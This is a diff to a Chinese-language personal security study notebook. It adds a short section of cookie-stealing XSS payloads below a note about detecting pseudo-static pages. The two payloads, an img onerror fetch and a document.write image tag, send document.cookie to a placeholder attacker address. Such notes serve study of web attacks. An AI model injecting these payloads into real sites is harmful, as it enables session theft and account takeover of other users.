--- a/安全学习笔记/【10】杂七杂八的记录.md
+++ b/安全学习笔记/【10】杂七杂八的记录.md
@@ -85,3 +85,12 @@ html页面感觉是伪静态的
   javascript:alert(document.lastModified)
 
 查看页面最后的修改时间，如果得到的时间和现在时间一致，就是伪静态页面
+
+### XSS获取cookie 的简单payload
+
+```
+<img src=x onerror=fetch("http://<your_ip>:port/"+document.cookie);>
+
+<script> document.write(' <img src="http://ip:port/?'+document.cookie+'">');</script>
+
+```
